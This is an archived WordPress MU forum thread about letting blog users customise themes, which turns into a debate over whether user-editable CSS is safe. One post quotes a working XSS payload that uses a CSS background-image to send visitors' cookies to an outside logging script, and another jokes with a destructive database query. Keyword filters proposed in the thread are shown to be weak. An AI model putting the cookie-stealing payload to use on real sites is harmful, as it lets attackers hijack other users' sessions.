The MU forums have moved to WordPress.org

Let your users customise any theme? (80 posts)

  1. mrball
    Member
    Posted 17 years ago #

    re: HTML_CSS
    The HTML_CSS class should already be included. If you do manage to install HTML_CSS yourself, you can edit the plugin and delete everything below the line that says "everything below this line can be deleted if you have HTML_CSS"

    donncha: I am not too concerned about whether they load style information in the header, but more about calling get_header() out of context, as the theme devs etc. would not be expecting it. For example, if they put some code in header.php which relied on footer.php to "end cleanly". 'Twas just a bit of 'defensive' coding on my part :)
    Anyway, pulling the whole page should not be too resource intensive (it caches it until the user clicks 'reset').

  2. mrball
    Member
    Posted 17 years ago #

    GUI is a great idea! I wanted to implement grouping all the same colours together and allowing the user to change the same colour throughout the CSS.

    another slightly more ambitious idea is to convert all the colours to HSB and allow the user to shift the HSB for all the colours... and also those of the images through an external img manipulation program like imagemagick!

    anybody wanna code it? :)

  3. donncha
    Key Master
    Posted 17 years ago #

    mrball - I call get_header() but capture the output of it in an output buffer :)

  4. MazZziKa
    Member
    Posted 17 years ago #

    Is it possible to edit the whole code of the theme for each member?

  5. mrball
    Member
    Posted 17 years ago #

    mazz: there's a plugin for that but your members can write stuff like $mysqbdb->query('update wp_blogs set title="u b33n p4Wn3D" where 1');

  6. andrea_r
    Moderator
    Posted 17 years ago #

    lol @ mrball

  7. MazZziKa
    Member
    Posted 17 years ago #

    thx, I just wanted to add items to the sidebar and I found a solution

  8. lobsterman
    Member
    Posted 17 years ago #

    how about an addition to this plugin that allows more advanced users to freely edit the stylesheet?

  9. mickemus
    Member
    Posted 17 years ago #

    While we're at it... let's standardise the tags and references in the templates... create more sections... break down the main template file into a few more pieces (apart from sidebar.php, footer.php etc.)! Muchos flexibilitos... but slow loading!!

    A CSS editor plugin would be way cool... with a live preview of the site so one can see the changes in its actual environment!!

  10. andrea_r
    Moderator
    Posted 17 years ago #

    Whoa - mickemus, you're on the same page as us - me and the mr were just talking about this last night. Sure, it might seem like a regression in terms of WP - but for MU it would be stellar.

    I'd love to see a different default MU theme - one that really showcases the functionality of the templating systems. (and different ones in the bundle too)

  11. lobsterman
    Member
    Posted 17 years ago #

    If the user can update the css and upload images, You can put up a flexible design, something like the css zen garden html, and the users can modify it to look however they want. this can really be cool...

  12. drmike
    Member
    Posted 17 years ago #

    Of course that allows folks to put in cookie grabbing javascripts and other "fun goodies"

  13. mickemus
    Member
    Posted 17 years ago #

    Leave my cookies alone... especially the chocolate chip ones!!!

  14. andrea_r
    Moderator
    Posted 17 years ago #

    I wouldn't put it on a wide-open, general MU site. But on a network, possibly for only some users who have requested it... (and shown they are not l33t hax0rs - or think they are..)

    What about having one MU theme that was highly-customizable?

  15. mickemus
    Member
    Posted 17 years ago #

    Great plugin.. no need to tweak the CSS directly or with a third-party tool. Maybe you want to port it for mu-plugins usage and place it under Site Admin with a theme selector dropdown? This way only the blog guru can do edits (hopefully)! Maybe even a "save as new" and "enable for blog_id X". Potential value added service - users get some free credits for changes then buy additional credits for more changes ;)

    Jason!! KUDOS!

  16. lobsterman
    Member
    Posted 17 years ago #

    Of course that allows folks to put in cookie grabbing javascripts and other "fun goodies"

    How exactly? I'm talking about letting them edit only the CSS file.
    And anyway, I don't see how any damage can be done with JS to the host (yes, he can collect info about his visitors, but anyone can do the same from any site they set up, so it's none of my business).

  17. donncha
    Key Master
    Posted 17 years ago #

    The problem is that your visitors have the login information for their blogs on your site in their browser cookies which are perfectly visible to any nasty Javascript.

  18. lobsterman
    Member
    Posted 17 years ago #

    So let me get this straight: the problem with CSS is that users will use JS to get information from cookies stored in their own browser? They can just look at them through the browser. Or is it the other users? Again, that's none of my business as long as my site stays secure.

  19. donncha
    Key Master
    Posted 17 years ago #

    lobsterman - I'd hate to have a blog on your site then.

    If I was logged in to my own blog on your site, and visited someone else's blog on your site, if they were malicious and could load Javascript they could steal my cookies with a small bit of code that calls a URL on their own server with my username and password when I visit. Here's how: http://jehiah.com/archive/xss-stealing-cookies-101

    Why doesn't this affect Blogger? They use a different server address for submitting comments. It's unwieldy, but works. You're never logged in on a blogspot.com URL.

  20. lobsterman
    Member
    Posted 17 years ago #

    I see. so the problem is javascript only? what if any combination of the letters j and s together get filtered out? would that solve the problem or can users run javascripts with other extensions?

    And is there a way to address this issue and allow users to use javascript, like set the login cookie to each blogs subdomain?

    also another idea to give users customization of the whole theme without risk might be a smarty based theme (with the php files not editable) what do you think?

  21. donncha
    Key Master
    Posted 17 years ago #

    It doesn't matter what extension you give a .js source file. It's all code in the end.
    You can filter the Javascript, which is what Myspace does I think, but then you leave yourself open to someone figuring out how to get past the filter. There was a Myspace worm a few months ago that took advantage of a bug in IE to propagate. You could certainly limit the cookies to each subdomain, or path, but then you lose out because people have to enter their details when leaving a comment, and you can't do nice things like having an admin bar for logged in users.

    Smarty was used in an older version, it works well, but it was abandoned because you still have problems with filtering Javascript, and CSS. Finally, there are a hell of a lot of WordPress themes out there that aren't written in Smarty template tags.

  22. lobsterman
    Member
    Posted 17 years ago #

    Finally, there are a hell of a lot of WordPress themes out there that aren't written in Smarty template tags.

    Yes, but I want to allow users to be able to customize as much as I can.

    What about strictly limiting file extensions in the css to gif, jpg and png? I'm pretty sure no browser will execute a script hidden as an image.

  23. donncha
    Key Master
    Posted 17 years ago #

    IE users are still exposed. A .jpg URL can really be a .php file. That's what happens in WPMU. Besides, the username/password appears in the remote user's logfile..
    See the example here:
    http://jehiah.com/archive/xss-stealing-cookies-101

  24. andrea_r
    Moderator
    Posted 17 years ago #

    Lobsterman, please see the Striped Plus theme. It has a really extensive options page for changing things on the theme. I'm not sure *how* secure it is, but it at least lets users tweak, which is what most of them want to do anyway.

  25. lobsterman
    Member
    Posted 17 years ago #

    donncha: I don't see how a remotely loading PHP file can be of any danger; it's not on the WPMU server and it's server side, so no harm user side. JS is what can be risky, and no browser will run a JS with a .jpg extension.

  26. donncha
    Key Master
    Posted 17 years ago #

    One more time then :)

    From the above-mentioned XSS page: (this will probably get mangled, you should read the above page carefully!)

    "We can also use another method in IE. Execute the javascript in CSS.

    <style>
    .getcookies{background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);');}
    </style>
    <p class="getcookies">

    Any time you let users post text and you don't religiously restrict the content, they can steal sessions. Scary? If you are a developer it better scare the hell out of you."

    See the filename of the jpeg file? It's log.cgi .. nasty, nasty, nasty.

  27. lobsterman
    Member
    Posted 17 years ago #

    OK, here's the combo: the words js and javascript, and http://, so all URLs are local only; and the image directory is set not to execute any script. Any security flaws now?

  28. donncha
    Key Master
    Posted 17 years ago #

    There probably are security risks. Javascript code could possibly send a comment to a post on the malicious blog on your site with the username and password.

    It's safer not to allow untrusted users to edit Javascript and even css.

  29. lobsterman
    Member
    Posted 17 years ago #

    hey, the world can't move forward without taking risks, this one doesn't sound serious (no javascript) so I'll probably do it.

  30. AndWat
    Member
    Posted 17 years ago #

    WPMU is open source... why not take the source and use it as a basis for a new project? I've even got a name for the fork: WPMV: WordPress Multiple Vulnerabilities...
